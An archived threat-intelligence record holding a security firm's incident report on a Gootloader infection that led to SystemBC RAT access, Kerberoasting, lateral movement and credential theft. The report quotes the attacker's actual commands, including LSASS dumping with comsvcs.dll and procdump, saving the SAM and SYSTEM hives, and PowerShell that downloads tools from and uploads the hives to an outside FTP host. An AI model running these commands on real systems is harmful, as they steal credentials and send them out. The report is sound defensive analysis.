{
	"id": "17a5785b-6bd4-4c2d-b72d-944433b4b792",
	"created_at": "2026-04-06T00:11:19.351631Z",
	"updated_at": "2026-04-10T13:11:50.184165Z",
	"deleted_at": null,
	"sha1_hash": "aca3488c14bf79ff6ac388dabeb468fa659c4e56",
	"title": "Goot to Loot—How a Gootloader Infection Led to Credential Access",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 399379,
	"plain_text": "Goot to Loot—How a Gootloader Infection Led to Credential Access\r\nBy Caroline Fenstermacher 22 June 2023\r\nPublished: 2023-06-22 · Archived: 2026-04-05 21:32:51 UTC\r\nHow many times have we heard “It takes just one click”? Well, in this case it took approximately three. In May 2023, the\r\nReliaQuest Threat Hunting Team responded to an incident involving credential access and exfiltration that was traced back\r\nto the JavaScript-based initial access malware “Gootloader.” Using endpoint and network telemetry, we were able to advise\r\non containment of the threat prior to impact, which was crucial since Gootloader can be leveraged as an initial access vector\r\nfor second-stage remote access tools with overall goal of deploying ransomware.\r\nIn this assessment, our team was able to identify that this particular strain of Gootloader leveraged a relatively new infection\r\nchain identified in 2022. In addition, our team identified evidence of the SystemBC RAT being leveraged as a second-stage\r\npayload to allow the attackers interactive remote access to the environment. Lastly, we discuss how the attacker leveraged\r\nthis to access and exfiltrate credentials from the environment.\r\nWhat Is Gootloader?\r\nBefore getting into the specific behavior we observed, let’s discuss Gootloader in terms of its known tactics, techniques, and\r\nprocedures (TTPs). Gootloader is a JavaScript-based initial access malware strain, meaning this is what a threat actor will\r\nuse to “initially access” the environment and enable the infiltration of remote access payloads in order to engage\r\ninteractively with its target.\r\nFor delivery, it typically depends on SEO poisoning, a technique used by attackers to manipulate the ranking of web pages\r\nin search engine results to draw clicks and prompt malware downloads. Once downloaded by the user and executed, the\r\nmalware typically establishes persistence via a scheduled task. 
It then begins command-and-control (C2) communication to\r\nrelay system information and infiltrate a second-stage payload that will be used to achieve post-exploitation objectives.\r\nOverall, the most common second-stage payload with Gootloader observed as a precursor is Cobalt Strike.\r\nKey Findings\r\nDelivery\r\nClick 1: During the intrusion handled by the ReliaQuest Threat Hunting Team, the initially infected user had visited an\r\ninfected site displaying the classic Gootloader forum template hosted at salamancaespectacular[.]com/what-is-the-difference-between-legal-ruled-and-wide-ruled-paper .\r\nClick 2: On this fake forum, a hyperlink prompted the user to download “the answer” to “what is the difference between\r\nlegal ruled and wide ruled paper” (Figure 1):\r\nFigure 1: Screenshot of a malicious webpage intended to host Gootloader\r\nConsidering social engineering techniques, it’s worth noting that Gootloader has recently been known to specifically target\r\nthe healthcare and legal industries. It’s easy to imagine a law student or legal firm employee innocently tapping the same\r\nquestion into Google.\r\nThe HTML of this page (Figure 2) revealed the download hosting link that the user is redirected to. This ultimately results in\r\na download of the ZIP file containing the malicious JS file onto the user’s local machine.\r\nhttps://www.reliaquest.com/blog/gootloader-infection-credential-access/\r\nPage 1 of 5\n\nFigure 2: Malicious Gootloader webpage HTML source code with download link\r\nAfter the user clicks on the file to execute it, the initial JS file executes via Windows Script Host (wscript.exe) using this\r\ncommand line:\r\n“C:\\Windows\\System32\\WScript.exe\"\"C:\\Users\\ExampleUser\\AppData\\Local\\Temp\\ Temp1_What_is_the_difference_between_legal_ruled_and_wide_ru\r\nis the difference between legal ruled and wide ruled paper 29094.js\r\nThus, the chain was started. 
We then observed the first Gootloader JS file dropping another JS file onto the host, named\r\nlead-based paint.js, within this directory:\r\nC:\\Users\\ExampleUser\\AppData\\Roaming\\Adobe\r\nThis appeared to be an attempt to masquerade as a legitimate Adobe process. The file was first dropped as Conceptual\r\nDesign.log within this directory:\r\nC:\\Users\\ExampleUser\\AppData\\Roaming\\Adobe\r\nAfter that, it was renamed to lead-based paint.js.\r\nHowever, the same Gootloader sample that we observed executing in the wild—and kicking off the incident our team\r\nresponded to—resulted in the file being placed into this directory:\r\nC:\\Users\\ExampleUser\\AppData\\Roaming\\AutoDesk\r\nThis observation was noteworthy because the initial JS payload appeared to change the directory in which it placed the second\r\nJS file on each execution of the malware. This was likely a developer tactic to evade defenders who might notice patterns in the\r\nfile’s placement.\r\nAfter this point, the JS file was referred to by its Windows short name, LEAD-B~1.JS, and its full filename was no longer used\r\nin WScript executions. 
That file, with its short name, was the final Gootloader payload.\r\nPersistence\r\nThe initial JS script (what is the difference between legal ruled and wide ruled paper 29094.js) added the\r\nsecondary script, in its shortened form, as a scheduled task on the victim’s machine with the name Tribal Consultation.\r\nThe task name did not vary between executions of the Gootloader malware and was configured to run under the context of\r\nthe initiating user upon login.\r\nFigure 3: Scheduled task event\r\nExecution and Second-Stage Payloads\r\nThe execution of the Gootloader payload LEAD-B~1.JS via wscript.exe launched an instance of cscript.exe, which\r\nultimately launched an obfuscated PowerShell command reaching out to 10 C2 domains.\r\nFigure 4: LEAD-B~1.JS Command-and-Control Domains\r\nAnalysis of the commands indicated that the initial communication with these domains included information about the\r\nmachine stored in environmental variables. These environmental variables were then sent to the observed domains within\r\ncookie headers.\r\nFigure 5: LEAD-B~1.JS cookie header collection\r\nThe script indicated that information collected within these variables included the operating system, symbolic link file\r\nnames, file folder names, filenames, and running processes. This information was then Base64 encoded and Gzip\r\ncompressed.\r\nThese domains were also used to infiltrate the second-stage payload into the machine to allow the attacker interactive remote\r\naccess. Since Gootloader is commonly known to inject the second-stage payload within the registry, we analyzed the\r\nregistry modifications resulting from network connections to the previously mentioned domains. 
We assessed this\r\npayload to likely reside within HKU\\ExampleUserSID\\SOFTWARE\\453694B5D3\\17016 and\r\nHKU\\ExampleUserSID\\SOFTWARE\\3144EAACD7\\636 .\r\nAs for identification of the second-stage payload, our team discovered, with a moderate level of confidence, that this was\r\nlikely to be SystemBC RAT. This attribution was based on observed network telemetry to the destination IP\r\n94[.]156[.]189[.]36 in reference to PowerShell executions from the registry key HKCU:\\SOFTWARE\\3144EAACD7\\$pid .\r\nAdditionally, the SHA-256 f2afd46cfef3883fc858ca7b7730d4d6ee56a7aedbdb1b1f7bda7dba054f489e associated with the file\r\nmaking these connections also strongly indicates this to be SystemBC RAT.\r\nDiscovery and Privilege Escalation\r\nAfter remote access to the initially accessed victim account was established, the attacker began discovery actions in an\r\nattempt to escalate privileges. They used that account to query Lightweight Directory Access Protocol (LDAP) information\r\nvia PowerShell, storing this information within environmental variables. This activity was evidenced by network\r\nconnections over port 389 (LDAP) and corresponding PowerShell command sourcing from the compromised user.\r\nPrivilege escalation did not occur until 58 days after the initial compromise. This could have been for many reasons—\r\nincluding an attempt at stealth, acting as an initial access broker (IAB) by handing this portion of the compromise to an\r\naffiliate (which Gootloader infections are known for), or simply a delay in operations. Our team observed the initially\r\ncompromised user querying Service Principal Names (SPNs) within the environment for service account discovery. SPNs\r\nare associated with a discoverable service and include an attached service account. 
Therefore, querying SPNs can allow an\r\nattacker to discover service accounts within the environment.\r\nShortly after the SPN requests, the initially compromised user requested a Kerberos ticket for a stale service account within\r\nthe environment using RC4 encryption. This activity was evidenced by Windows Security event log ID 4768 (“A Kerberos\r\nservice ticket was requested”), which indicated the encryption type to be 0x17 (RC4-HMAC). When requesting a Kerberos\r\nservice ticket using an encryption type such as RC4, the returned ticket is encrypted with the account’s NTLM password\r\nhash. As this encryption method is outdated, it can easily be cracked by attackers offline.\r\nIn addition to the service account our team was already aware of, similar Kerberoasting activity was observed\r\nagainst several users within the environment. The resulting information was most likely collected as a list and exfiltrated\r\nto the observed C2 domains. Following this, our team did not observe interactive access to this service\r\naccount for three days.\r\nUpon interactive access to the service account, our team observed this account gathering additional information regarding\r\nthe environment in a similar fashion to the initially compromised user—by gathering information within environmental\r\nvariables and exfiltrating it to the C2 domains hxxps://demo.petsure.com/xmlrpc[.]php,\r\nhxxps://cacommerciallaw.com/xmlrpc[.]php, and hxxps://docs.vrent.techvill.net/xmlrpc[.]php.\r\nLateral Movement\r\nLateral movement was performed via the Remote Desktop Protocol (RDP), sourcing from the initially compromised\r\nhost. Based on network telemetry, our team identified that the attacker used the compromised service account to RDP to\r\nthree unique hosts within the environment within minutes of each other. Of these connections, interactive actions were only\r\ntaken on one of the observed hosts: a Stealthbits server. 
These RDP connections were sourced from the user’s active\r\nPowerShell session on the source host.\r\nCredential Dumping and Exfiltration\r\nOnce remote access was established to the Stealthbits server, the attacker attempted to dump LSASS credentials on the host. The\r\ncontents of LSASS memory can include encrypted passwords, NT hashes, LM hashes, and Kerberos tickets of active users\r\non the machine—making it a prime target for attackers. The attacker used the MiniDump function of comsvcs.dll, a\r\nWindows-native DLL whose MiniDump function enables a user to write the memory contents of a\r\nspecified process ID to a file. By specifying the process ID of LSASS on the host, an attacker can output the contents to a dump file\r\nof their choice. In this case, the attacker did not pick an inconspicuous name for the output dump file. The file\r\nlsassdump.dmp was created via the following command:\r\n“C:\\Windows\\system32\\rundll32.exe” C:\\Windows\\System32\\comsvcs.dll MiniDump 980 C:\\lsassdump.dmp full\r\nBased on EDR telemetry, this activity appeared unsuccessful due to prevention controls. 
Following this, the compromised\r\nservice account was observed infiltrating “procdump.exe”, hosted externally via FTP at:\r\nftp://eu9[.]richhost[.]eu/procdump/procdump[.]exe\r\nThis was done via a PowerShell download:\r\n[Console]::OutputEncoding=[Text.UTF8Encoding]::UTF8;[System.Console]::InputEncoding=\r\n[Text.UTF8Encoding]: :UTF8;$key=\"E41EDE8E76\";function etc($b){$ab1=\r\n[tEXt.enCodInG]::unIcOde.gEtsTriNg([Convert]::fRoMBaSe64stRiNg($b)); try{ieX $ab1 -oUtv ou -erRoRv erw|out-null;}cAtCh{}$o1o=ouT-sTriNg -i $ou;if($erw){$o1o +=ouT-sTriNg -i $erw};\r\n[Convert]::tObAsE64stRiNg ([teXt.enCodInG]::unIcoDe.geTbyTeS($o1o))};$txn=New-Object System.Collections.ArrayList;$txn += , @(\"27467B160F\",\"$client = New-Object\r\nSystem.Net.WebClient;$client.Credentials = New-Object System.Net.NetworkCredential(\"user356\",\r\n\"7Y8nvt[RpOigl\");$client.DownloadFile (\"ftp://eu9.richhost.eu/procdump/procdump.exe\",\r\n\"C:\\procdump\");\");$txn | ForEach-Object {$txt=$_[0];$txe=etc($_[1]);\"[$key|$txt]$txe[$txt|$key]\"};\r\nProcdump is a well-known Windows Sysinternals tool that can be used to generate crash dumps of a given process.\r\nFollowing the infiltration of this tool, the attacker was observed leveraging it on the host to create a dump file of LSASS\r\nmemory:\r\nprocdump -accepteula -ma lsass.exe lsassdump\r\nAfter dumping LSASS via procdump, the compromised user was observed saving the contents of the\r\nSYSTEM hive and the SAM hive via the registry tool reg.exe. The SYSTEM hive includes sensitive settings\r\nand configurations associated with the local machine, including software configurations, application properties, possible\r\nuser account information, default port configurations, etc. Of particular importance is that this is the location of the\r\nSYSKEY, which may contain keys used to encrypt the SAM database. 
The command used by the attacker to save the\r\nSYSTEM hive can be seen below:\r\nreg save hklm\\system system\r\nThe SAM database contains items similar to those found in LSASS memory, such as usernames and their respective NTLM password\r\nhashes. The attacker may have chosen to dump both to ensure all credentials were captured. The command used to save the\r\nSAM hive can be seen below:\r\nreg save hklm\\sam\r\nThe attacker then began exfiltration of their captured data. Both hive exports were uploaded to the previously observed FTP\r\nhosting site, eu9[.]richhost[.]eu, via PowerShell:\r\n$client = New-Object System.Net.WebClient;$client.Credentials = New-Object\r\nSystem.Net.NetworkCredential(\"user356\",\r\n\"7Y8nvt[RpOigl\");$client.UploadFile(\"ftp://eu9.richhost.eu/procdump/system\", \"C:\\system\");\r\n$client = New-Object System.Net.WebClient;$client.Credentials = New-Object\r\nSystem.Net.NetworkCredential(\"user356\",\r\n\"7Y8nvt[RpOigl\");$client.UploadFile(\"ftp://eu9.richhost.eu/procdump/sam\", \"C:\\sam\");\r\nAt this point, access to compromised accounts was cut and associated hosts were isolated. No additional events associated\r\nwith the incident were noted by the ReliaQuest Threat Hunting Team.\r\nAttack Timeline\r\nFigure 6: Gootloader attack timeline\r\nConclusion and Recommendations\r\nAs we can see from this assessment, a simple Google search and an over-trusting mindset can lead to disastrous results for\r\nan organization. 
Luckily, the ReliaQuest Threat Hunting team was able to advise on containment of the threat prior to more\r\nsevere actions taking place, such as lateral movement to a domain controller and/or the deployment of ransomware.\r\nThe following are general recommendations that can help prevent the same actions in any environment.\r\nRecommendations for Prevention\r\nIoC Collection\r\nSource: https://www.reliaquest.com/blog/gootloader-infection-credential-access/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.reliaquest.com/blog/gootloader-infection-credential-access/"
	],
	"report_names": [
		"gootloader-infection-credential-access"
	],
	"threat_actors": [
		{
			"id": "d90307b6-14a9-4d0b-9156-89e453d6eb13",
			"created_at": "2022-10-25T16:07:23.773944Z",
			"updated_at": "2026-04-10T02:00:04.746188Z",
			"deleted_at": null,
			"main_name": "Lead",
			"aliases": [
				"Casper",
				"TG-3279"
			],
			"source_name": "ETDA:Lead",
			"tools": [
				"Agentemis",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"RbDoor",
				"RibDoor",
				"Winnti",
				"cobeacon"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434279,
	"ts_updated_at": 1775826710,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/aca3488c14bf79ff6ac388dabeb468fa659c4e56.pdf",
		"text": "https://archive.orkl.eu/aca3488c14bf79ff6ac388dabeb468fa659c4e56.txt",
		"img": "https://archive.orkl.eu/aca3488c14bf79ff6ac388dabeb468fa659c4e56.jpg"
	}
}